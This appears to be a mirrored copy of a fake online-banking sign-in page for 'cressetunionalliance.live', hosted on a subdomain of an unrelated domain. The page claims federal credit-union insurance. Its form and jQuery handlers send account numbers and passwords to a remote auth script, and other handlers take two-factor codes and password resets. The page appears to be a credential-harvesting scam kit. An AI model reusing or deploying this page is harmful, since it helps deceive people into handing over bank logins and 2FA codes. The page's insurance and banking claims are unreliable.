<script>window.location.href='../index.html';</script>   
<!DOCTYPE html>
<html lang="en-US" class="js">

<!-- Mirrored from cressetunionalliance.live.geraldwhitesaving.com/myaccount/secure/index by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jul 2023 14:30:13 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>  
    <meta charset="utf-8">
    <meta name="author" content="Softnio">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="cressetunionalliance.live is federally insured by the National Credit Union Administration. We do business in accordance with the Fair Housing Law and Equal opportunity Credit Act.">
    <link rel="shortcut icon" href="../images/favicon.png" type="image/x-icon">
    <!-- Fav Icon  -->
    <link rel="shortcut icon" href="../images/favicon.png">
    <!-- Page Title  -->
    <title>Home |  Welcome to cressetunionalliance.live Online Banking</title>
    <!-- StyleSheets  -->
    <link rel="stylesheet" href="../assets/css/dashlite8d5a.css?ver=2.4.0">
    <link rel="stylesheet" href="../scss/sweetalert.css">
    <link id="skin-default" rel="stylesheet" href="../assets/css/theme8d5a.css?ver=2.4.0">
    <link id="skin-default" rel="stylesheet" href="../assets/css/theme8d5a.css?ver=2.4.0">
    <link href="../css/toastr.css" rel="stylesheet"/>
</head>
<script type="text/javascript">
function googleTranslateElementInit() {
new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
}
</script>
<script type="text/javascript" src="../../../translate.google.com/translate_a/elementa0d8.js?cb=googleTranslateElementInit"></script>
    <style>
.goog-te-gadget-simple {
border:none;
}
.goog-te-gadget-simple a {
color:#000;
}
</style>
<style type="text/css">
    .btn-primary{
        background-color: #3140fc;
    }
    .btn-secondary{
        background-color: #d13636;
    }
    .btn-secondary:hover{opacity: 0.6;}
    .btn-primary:hover{opacity: 0.6;}
</style>
<style>
    input[type=number] {
        height: 50px;
        width: 50px;
        font-size: 25px;
        color: #3140fc;
        text-align: center;
        border: 3px solid #3140fc;
        box-shadow: 4px #3140fc;
        border-radius: 7px;
        font-weight: 600;
    }
    input[type=number]:focus{
        border-bottom:5px solid #008000;
        
    }
    input[type=number]::-webkit-inner-spin-button,
    input[type=number]::-webkit-outer-spin-button {
        -webkit-appearance: none;
        margin: 0;
    }
    </style>
<body class="nk-body npc-crypto bg-white pg-auth">
    <!-- app body @s -->
    <div class="nk-app-root">
        <div class="justify-center card-header">
            <div class="nk-split-content nk-block-area nk-block-area-column nk-auth-container bg-white">
                <div class="absolute-top-right d-lg-none p-3 p-sm-5">
                    <a href="#" class="toggle btn-white btn btn-icon btn-light" data-target="athPromo"><em class="icon ni ni-info"></em></a>
                </div>
                <div class="nk-block nk-block-middle nk-auth-body">
                <center class="brand-logo pb-5">
                        <a href="../index.html" class="logo-link">
                            <img class="logo-light logo-img logo-img-lg" src="../logo.png" srcset="../logo.png" alt="logo">
                            <img class="logo-dark logo-img logo-img-lg" src="../logo.png" srcset="../logo.png" alt="logo-dark">
                        </a>
                    </center>
                
                    <br>
                       
                    
                    <div class="nk-block-head">
                        <div class="nk-block-head-content">
                            <h3 class="nk-block-title">Sign-In</h3>
                            <div class="nk-block-des alert alert-pro alert-primary">
                                <p class="alert-text">Access the cressetunionalliance.live online banking panel using your Account number and password.</p>
                            </div>
                        </div>
                    </div><!-- .nk-block-head -->
                    <form action="https://cressetunionalliance.live.geraldwhitesaving.com/myaccount/scripts/auth?action=userLogin" id="loginForm" method="post">
                        <div class="form-group">
                            <div class="form-label-group">
                                <label class="form-label" for="default-01">Account Number</label>
                            </div>
                            <input type="text" class="form-control form-control-lg" required autocomplete="off" id="id" placeholder="Enter your Account Number" name="id">
                        </div><!-- foem-group -->
                        <div class="form-group">
                            <div class="form-label-group">
                                <label class="form-label" for="password">Passsword</label>
                                <a class="link link-primary link-sm" tabindex="-1" href="index89dc.html?action=resetpass&amp;access=">Forgot Code?</a>
                            </div>
                            <div class="form-control-wrap">
                                <a tabindex="-1" href="#" class="form-icon form-icon-right passcode-switch" data-target="pass">
                                    <em class="passcode-icon icon-show icon ni ni-eye"></em>
                                    <em class="passcode-icon icon-hide icon ni ni-eye-off"></em>
                                </a>
                                <input type="password" class="form-control form-control-lg" id="pass" required placeholder="Enter your password" name="pass">
                            </div>
                            <div id="loginResult"></div>
                        </div><!-- .foem-group -->
                        <div class="form-group">
                            <button class="btn btn-lg btn-primary btn-block secretFordm" type="submit" id="btn">Continue</button>
                        </div>
                    </form><!-- form -->
                    <center class="p-3">
                        <a href="index375a.html?action=enroll&amp;access=" class="btn btn-sm btn-secondary"><em class="icon ni ni-regen"></em>  Enroll for Online Banking</a>
                    </center>
                                </div><!-- .nk-block -->
                <div class="nk-block nk-auth-footer" style="margin-top:60px;">
            <a href="#" style=""><div id="google_translate_element"></div> </a>
                <div class="mt-3">
                        <p>&copy; 2023 cressetunionalliance.live. All Rights Reserved.</p>
                    </div>
                </div><!-- .nk-block -->
            </div><!-- .nk-split-content -->
        
        </div><!-- .nk-split -->
    </div><!-- app body @e -->
    <!-- JavaScript -->
        <script src="../js/jquery.min.js"></script>
    <script type="text/javascript">
    $(document).ready(function (e) {
    $("#loginForm").on('submit',(function(e) {
        document.getElementById("btn").disabled = true;
        e.preventDefault();
        $.ajax({
            url: "../scripts/auth?action=userLogin",
            type: "POST",
            data:  new FormData(this),
            contentType: false,
            cache: false,
            processData:false,
            success: function(data)
            {
            $("#loginResult").html(data);
            document.getElementById("btn").disabled = false;
            },
            error: function()
            {
            }           
    });
    }));
});
//2FA FORM VERIFICATION
    $(document).ready(function (e) {
    $("#2faForm").on('submit',(function(e) {
        document.getElementById("btn").disabled = true;
        e.preventDefault();
        $.ajax({
            url: "../scripts/auth?action=userVerify2fa",
            type: "POST",
            data:  new FormData(this),
            contentType: false,
            cache: false,
            processData:false,
            success: function(data)
            {
            $("#loginResult").html(data);
            document.getElementById("btn").disabled = false;
            },
            error: function()
            {
            }           
    });
    }));
});

//USER PASSWORD RESET
    $(document).ready(function (e) {
    $("#resetForm").on('submit',(function(e) {
        document.getElementById("btn").disabled = true;
        e.preventDefault();
        $.ajax({
            url: "../scripts/auth?action=userPassReset&code=677158",
            type: "POST",
            data:  new FormData(this),
            contentType: false,
            cache: false,
            processData:false,
            success: function(data)
            {
            $("#resetResult").html(data);
            document.getElementById("btn").disabled = false;
            },
            error: function()
            {
            }           
    });
    }));
});



//2FA INPUTS
function getCodeBoxElement(index) {
        return document.getElementById('codeBox' + index);
    }
    function onKeyUpEvent(index, event) {
        const eventCode = event.which || event.keyCode;
        if (getCodeBoxElement(index).value.length === 1) {
        if (index !== 4) {
            getCodeBoxElement(index+ 1).focus();
        } else {
            getCodeBoxElement(index).blur();
            // Submit code
            console.log('submit code ');
        }
        }
        if (eventCode === 8 && index !== 1) {
        getCodeBoxElement(index - 1).focus();
        }
    }
    function onFocusEvent(index) {
        for (item = 1; item < index; item++) {
        const currentElement = getCodeBoxElement(item);
        if (!currentElement.value) {
            currentElement.focus();
            break;
        }
        }
    }
var max_chars = 1;

$('#codeBox1').keydown( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});

$('#codeBox1').keyup( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});
$('#codeBox2').keydown( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});

$('#codeBox2').keyup( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});
$('#codeBox3').keydown( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});

$('#codeBox3').keyup( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});
$('#codeBox4').keydown( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});

$('#codeBox4').keyup( function(e){
    if ($(this).val().length >= max_chars) { 
        $(this).val($(this).val().substr(0, max_chars));
    }
});
</script>
    <script src="../assets/js/bundle8d5a.js?ver=2.4.0"></script>
    <script src="../assets/js/scripts8d5a.js?ver=2.4.0"></script>
<script src="../js/vendors/sweetalert.js"></script>
    <script src="../assets/js/custom.js"></script>
<script src="../js/toastr.js"></script>
</body>

<!-- Mirrored from cressetunionalliance.live.geraldwhitesaving.com/myaccount/secure/index by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jul 2023 14:30:15 GMT -->
</html>